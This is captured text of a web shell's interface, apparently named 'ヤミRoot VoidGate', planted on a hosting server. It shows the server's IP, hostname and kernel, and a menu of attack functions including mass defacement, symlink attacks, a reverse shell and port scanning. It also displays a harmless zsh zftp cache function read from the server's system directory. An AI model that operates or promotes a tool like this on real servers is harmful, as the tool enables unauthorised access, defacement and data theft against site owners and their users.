ヤミRoot VoidGate
User / IP
:
216.73.216.49
Host / Server
:
146.88.233.70 / www.dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
usr
/
share
/
zsh
/
5.0.2
/
functions
/
Viewing: zffcache
# Generate an array name for storing the cache for the current session, # storing it in fcache_name, then generate the cache for the current # directory, or with argument -d clear the cache. [[ $1 = -d ]] && local fcache_name fcache_name=$zfconfig[fcache_$ZFTP_SESSION] if [[ -z $fcache_name ]]; then local vals vals=(${(v)zfconfig[(I)fcache_*]##zftp_fcache_}) integer i while [[ -n ${vals[(r)zftp_fcache_$i]} ]]; do (( i++ )) done fcache_name=zftp_fcache_$i zfconfig[fcache_$ZFTP_SESSION]=$fcache_name fi if [[ $1 = -d ]]; then unset $fcache_name elif (( ${(P)#fcache_name} == 0 )); then local tmpf=${TMPPREFIX}zffcache$$ zftp ls >$tmpf eval "$fcache_name=(\${(f)\"\$(<\$tmpf)\"})" rm -f $tmpf fi
Coded With 💗 by
0x6ick